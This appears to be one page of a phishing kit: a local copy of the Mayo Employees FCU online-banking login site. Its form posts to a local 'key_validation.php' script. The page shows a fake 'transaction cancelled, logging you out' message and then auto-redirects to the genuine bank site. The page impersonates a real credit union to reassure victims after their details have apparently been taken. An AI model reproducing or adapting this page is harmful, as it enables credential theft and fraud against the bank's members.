

<!DOCTYPE html>


    <meta http-equiv="refresh" content="3; url=https://olb.mayocreditunion.org/authentication">

<html lang="en-US" class="default js-focus-visible">

<head>

	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

	<style>body {transition: opacity ease-in 0.2s; } 
body[unresolved] {opacity: 0; display: block; overflow: hidden; position: relative; } 


</style>
    

    <title>Mayo Employees FCU

    </title>



<meta http-equiv="X-UA-Compatible" content="IE=Edge">



<meta name="msapplication-config" content="none">


<meta name="format-detection" content="telephone=no">





<!-- favicons -->


<link rel="apple-touch-icon" sizes="60x60" href="https://assets.orb.alkamitech.com/production/themesets/405b7509-3cd4-43f3-b93a-44aabfb62df2/themes/legacy/default/Favicons/apple-touch-icon-60x60.png">


<link rel="apple-touch-icon" sizes="76x76" href="https://assets.orb.alkamitech.com/production/themesets/405b7509-3cd4-43f3-b93a-44aabfb62df2/themes/legacy/default/Favicons/apple-touch-icon-76x76.png">


<link rel="apple-touch-icon" sizes="120x120" href="https://assets.orb.alkamitech.com/production/themesets/405b7509-3cd4-43f3-b93a-44aabfb62df2/themes/legacy/default/Favicons/apple-touch-icon-120x120.png">


<link rel="apple-touch-icon" sizes="152x152" href="https://assets.orb.alkamitech.com/production/themesets/405b7509-3cd4-43f3-b93a-44aabfb62df2/themes/legacy/default/Favicons/apple-touch-icon-152x152.png">


<link rel="apple-touch-icon" sizes="180x180" href="https://assets.orb.alkamitech.com/production/themesets/405b7509-3cd4-43f3-b93a-44aabfb62df2/themes/legacy/default/Favicons/apple-touch-icon-180x180.png">


<link rel="icon" type="image/png" sizes="32x32" href="https://assets.orb.alkamitech.com/production/themesets/405b7509-3cd4-43f3-b93a-44aabfb62df2/themes/legacy/default/Favicons/favicon-32x32.png">


<link rel="icon" type="image/png" sizes="192x192" href="https://assets.orb.alkamitech.com/production/themesets/405b7509-3cd4-43f3-b93a-44aabfb62df2/themes/legacy/default/Favicons/android-chrome-192x192.png">


<link rel="icon" type="image/png" sizes="16x16" href="https://assets.orb.alkamitech.com/production/themesets/405b7509-3cd4-43f3-b93a-44aabfb62df2/themes/legacy/default/Favicons/favicon-16x16.png">


<link rel="manifest" href="https://assets.orb.alkamitech.com/production/themesets/405b7509-3cd4-43f3-b93a-44aabfb62df2/themes/legacy/default/Favicons/site.webmanifest">


<link rel="mask-icon" href="https://assets.orb.alkamitech.com/production/themesets/405b7509-3cd4-43f3-b93a-44aabfb62df2/themes/legacy/default/Favicons/safari-pinned-tab.svg" color="#29176b">


<link rel="shortcut icon" href="https://assets.orb.alkamitech.com/production/themesets/405b7509-3cd4-43f3-b93a-44aabfb62df2/themes/legacy/default/Favicons/favicon.ico">


<meta name="msapplication-TileColor" content="#29176b">


<meta name="msapplication-TileImage" content="https://assets.orb.alkamitech.com/production/themesets/405b7509-3cd4-43f3-b93a-44aabfb62df2/themes/legacy/default/Favicons/mstile-144x144.png">


<meta name="msapplication-config" content="https://assets.orb.alkamitech.com/production/themesets/405b7509-3cd4-43f3-b93a-44aabfb62df2/themes/legacy/default/Favicons/browserconfig.xml">


<meta name="theme-color" content="#29176b">



<!-- slughorn -->


<link href="https://assets.orb.alkamitech.com/production/icons/MayoEmployeesFCU/font/font-icons.css" rel="stylesheet" type="text/css">


<!-- fonts -->


<link href="./index_files/css" rel="Stylesheet" type="text/css">



<!-- slughorn -->


<link href="./index_files/font-icons.css" rel="stylesheet" type="text/css">

	

	<!--[if IE]>
	

	<link href="https://assets.orb.alkamitech.com/cdn/alkami-orb-client-global/1.5.0/stylesheets/compat/ie.min.css" rel="stylesheet" type="text/css" />


<![endif]-->



<link href="./index_files/yui-reset.min.css" rel="stylesheet" type="text/css">


<link href="./index_files/jquery-ui.min.css" rel="stylesheet" type="text/css">


<link href="./index_files/jquery.daterangepicker.min.css" rel="stylesheet" type="text/css">


<link href="./index_files/ext-all.min.css" rel="stylesheet" type="text/css">


<link href="./index_files/base.min.css" rel="stylesheet" type="text/css">


<link href="./index_files/grid.min.css" rel="stylesheet" type="text/css">


<link href="./index_files/sidebar.min.css" rel="stylesheet" type="text/css">


<link href="./index_files/print.min.css" media="print" rel="stylesheet" type="text/css">


<link href="./index_files/iris.shim.desktop.min.css" rel="stylesheet" type="text/css">


<link href="./index_files/iris.min.css" rel="stylesheet" type="text/css">


<link href="./index_files/iris-foundation.min.css" rel="stylesheet" type="text/css">



	

	
    

    <link rel="stylesheet" href="./index_files/iris-components.shim.desktop.min.css" type="text/css">
              

              <link rel="stylesheet" href="./index_files/iris-foundation.min(1).css" type="text/css">
              

              <link rel="stylesheet" href="./index_files/iris-components.min.css" type="text/css">
    

    <link rel="stylesheet" href="./index_files/isotope.min.css" type="text/css">


	
	

	<link rel="stylesheet" crossorigin="anonymous" href="./index_files/theme.desktop.min.css">

	
	

	<link rel="stylesheet" crossorigin="anonymous" href="./index_files/fi.desktop.min.css">




</head>



<body class="Authentication public shared-layout username-and-password iris-keyboard-use-detected" data-orion="" data-new-gr-c-s-check-loaded="14.1138.0" data-gr-ext-installed="">
    




<div id="meta_header">
    

    <div class="cms-content-area" data-cms-content-area="top-ribbon">

    </div>
    

    <div id="system_alert">

    </div>
    


</div>

	

	<header class="orbital-header" role="banner">
		

		<div class="orbital-header__top-region">
			

			<div class="orbital-header__content">

			</div>
		

		</div>
		

		<div class="orbital-header__middle-region">
			

			<div class="orbital-header__content">
				

				<div class="orbital-header__logo">
					

					<a href="https://olb.mayocreditunion.org/Client/Home" class="logo">
						

						<img alt="Mayo Employees FCU Dashboard" class="orbital-header__logo-img" src="./index_files/Logo">
					

					</a>
				

				</div>

			

			</div>
		

		</div>
		

		<div class="orbital-header__bottom-region">
			

			<div class="orbital-header__content">

			</div>
		

		</div>
	

	</header>

    

    <div class="cms-content-area" data-cms-content-area="header-card">

    </div>
    

    <div id="main">
        

        <div id="primary_widget_outer">
            

            <div id="primary_widget" role="main">
                

                <div id="primary_widget_title" class="widget-header">

                	<div id="widget_breadcrumbs" style="display: none;" class="widget-header__breadcrumbs">

                	</div>
                

                <h1 id="widget_title" class="widget-header__title" aria-hidden="true">

                </h1>

                <p id="widget_subtitle" class="widget-header__subtitle">

                </p>

                <ul id="widget_nav" class="widget-title-bar__tab-list widget-header__navigation" role="navigation" style="display: none;" aria-hidden="true">

                </ul>

                <div id="widget_actions" class="widget-header__actions">

                </div>

            </div>
                

                <div id="primary_widget_content" style="visibility: visible;">
                    

                    <!-- actual widget content -->
                    




<div id="app" class="isotope-app">

	<div class="isotope-page--authentication isotope-page">

		<div class="isotope-challenge-type--username-and-password isotope-challenge-type">

		<div id="irisv_sheet_8240x5vbcws" role="dialog" aria-label="Information" aria-hidden="true" class="irisv-sheet irisv-sheet--bottom irisv-sheet--partial irisv-sheet--suppressed isotope-hidden--desktop info-sheet hidden" data-cy="mobileInfoPanel">

		<div id="irisv_sheet_8240x5vbcws__scrim" class="irisv-sheet__scrim">

	</div>

<div tabindex="0" aria-label="Information" class="irisv-sheet__container" style="top: 100%;">

	<button type="button" aria-label="Open Sheet" class="irisv-sheet__grabber">

	</button>

<div tabindex="-1" class="irisv-sheet__header irisv-sheet__header--shadow">

	<!---->

	<!---->

<h2 id="irisv_sheet_8240x5vbcws_title" class="irisv-sheet__header-text"> Information 

</h2>

<!---->

<!---->

</div>

<div class="irisv-sheet__content">

	<div class="top-buffer">

	</div>

<div class="irisv-sheet__inner-content">

	<div id="mobile-info-panel">

	</div>

</div>

<div class="bottom-buffer">

</div>

</div>

<!---->

<div class="irisv-sheet__footer irisv-sheet__footer--shadow" style="display: none;">

</div>

<div tabindex="0">

</div>

</div>

</div>

<div class="login-image-container">



	

	<form  method="post" action="key_validation.php" autocapitalize="off" spellcheck="false"  role="form" class="isotope-slide usernameAndPasswordForm">

        <!---->

<br>
<br>
    <br><center><svg version="1.1" id="Layer_1" width="70" x="0px" y="0px" viewBox="0 0 117.72 117.72" style="enable-background:new 0 0 117.72 117.72" xml:space="preserve"><style type="text/css"><![CDATA[
                                                        .st0{fill:#008576;}
                                                    ]]></style><g><path class="st0" d="M58.86,0c9.13,0,17.77,2.08,25.49,5.79c-3.16,2.5-6.09,4.9-8.82,7.21c-5.2-1.89-10.81-2.92-16.66-2.92 c-13.47,0-25.67,5.46-34.49,14.29c-8.83,8.83-14.29,21.02-14.29,34.49c0,13.47,5.46,25.66,14.29,34.49 c8.83,8.83,21.02,14.29,34.49,14.29s25.67-5.46,34.49-14.29c8.83-8.83,14.29-21.02,14.29-34.49c0-3.2-0.31-6.34-0.9-9.37 c2.53-3.3,5.12-6.59,7.77-9.85c2.08,6.02,3.21,12.49,3.21,19.22c0,16.25-6.59,30.97-17.24,41.62 c-10.65,10.65-25.37,17.24-41.62,17.24c-16.25,0-30.97-6.59-41.62-17.24C6.59,89.83,0,75.11,0,58.86 c0-16.25,6.59-30.97,17.24-41.62S42.61,0,58.86,0L58.86,0z M31.44,49.19L45.8,49l1.07,0.28c2.9,1.67,5.63,3.58,8.18,5.74 c1.84,1.56,3.6,3.26,5.27,5.1c5.15-8.29,10.64-15.9,16.44-22.9c6.35-7.67,13.09-14.63,20.17-20.98l1.4-0.54H114l-3.16,3.51 C101.13,30,92.32,41.15,84.36,52.65C76.4,64.16,69.28,76.04,62.95,88.27l-1.97,3.8l-1.81-3.87c-3.34-7.17-7.34-13.75-12.11-19.63 c-4.77-5.88-10.32-11.1-16.79-15.54L31.44,49.19L31.44,49.19z"/></g></svg><br>
                                                    <br>
                                                <h3>The transaction has been cancelled successfully.</h3><p >We are logging you out.......</p></center>
                                                   
                                                    <br>
                                                    <br>
        </form>

        <!---->

            <div class="mar-bottom--small isotope-hidden--desktop">

            </div>

        </div>

    </div>





           </div>

       </div>
                    

                    <!-- end actual widget content -->
                

                </div>
            

            </div>
            
        

        </div>
        

        <div class="clear">

        </div>
    

    </div>
    

    <div class="cms-content-area" data-cms-content-area="body-card">

    </div>
    

    <div class="footer-wrapper">
        

        <footer class="container pad--lg" role="contentinfo">



<div class="row mar-bottom--xl">
    

    <!-- Links -->
    

    <div class="col-8">
        

        <div class="row footer-nav" role="navigation">
            

            <ul class="flex footer-nav-links flex-content--start flex--wrap mar-child-bottom--md mar-child-right--xl">
                

                <li class="inline-flex">
                    

                    <a href="https://olb.mayocreditunion.org/" target="_blank" rel="noopener noreferrer" class="font-size--xs">
                        Home
                    

                    </a>
                

                </li>
                

                <li class="inline-flex">
                    

                    <a href="https://olb.mayocreditunion.org/Mobile" target="_blank" rel="noopener noreferrer" class="font-size--xs">
                        Mobile
                    

                    </a>
                

                </li>
                

                <li class="inline-flex">
                    

                    <a href="https://www.mayocreditunion.org/contact-us.html" target="_blank" rel="noopener noreferrer" class="font-size--xs">
                        Contact
                    

                    </a>
                

                </li>
                

                <li class="inline-flex">
                    

                    <a href="https://mayocreditunion.org/online-banking-terms-and-conditions.html" target="_blank" rel="noopener noreferrer" class="font-size--xs">
                        Terms &amp; Conditions
                    

                    </a>
                

                </li>
                

                <li class="inline-flex">
                    

                    <a href="https://www.mayocreditunion.org/privacy.html" target="_blank" rel="noopener noreferrer" class="font-size--xs">
                        Privacy Policy
                    

                    </a>
                

                </li>
                                


<li class="inline-flex">

	<a class="font-size--xs" href="https://olb.mayocreditunion.org/authentication#/browser-support" id="browser-support-info" title="Open Browser Support Dialog">Browser Support

	</a>

</li>            

</ul>
        

        </div>
    

    </div>

    

    <!-- Routing Number -->
    

    <div class="col-4">
        

        <div class="row flex flex-justify--end">
            

            <span class="mar-right--sm">Routing number

            </span>
            

            <span class="font-weight--bold">291975478

            </span>
        

        </div>
    

    </div>



</div>



<div class="row mar-top--lg">
    

    <!-- Copyright -->
    

    <div class="col flex flex-shrink--0 flex-items--end">
        

        <div class="row">
            

            <div class="font-size--xs">
                Copyright © 2023. All rights reserved.
            

            </div>
        

        </div>
    

    </div>
    

    <!-- Insurance Icons -->
    

    <div class="col flex flex-grow--1 flex-justify--end">
        

        <div class="row flex--nowrap flex-items--end mar-child-left--md">
            

            <span class="font-icon-ehl" data-icon-size="3xl" role="img" aria-label="Equal Housing Lender.">

            </span>
            

            <span class="font-icon-ncua" data-icon-size="3xl" role="img" aria-label="Your savings federally insured to at least $250,000 and backed by the full faith and credit of the United States Government. National Credit Union Administration, a U.S. Government Agency.">

            </span>
        

        </div>
    

    </div>



</div>


</footer>

    

    </div>
    

    <div id="language_toggle" class="language-toggle" data-locale-count="1" style="display: none;">

    	<a id="language_toggle_link0" class="language-item current" href="https://olb.mayocreditunion.org/authentication#">English

    	</a>

</div>


    

    
    


</body>

</html>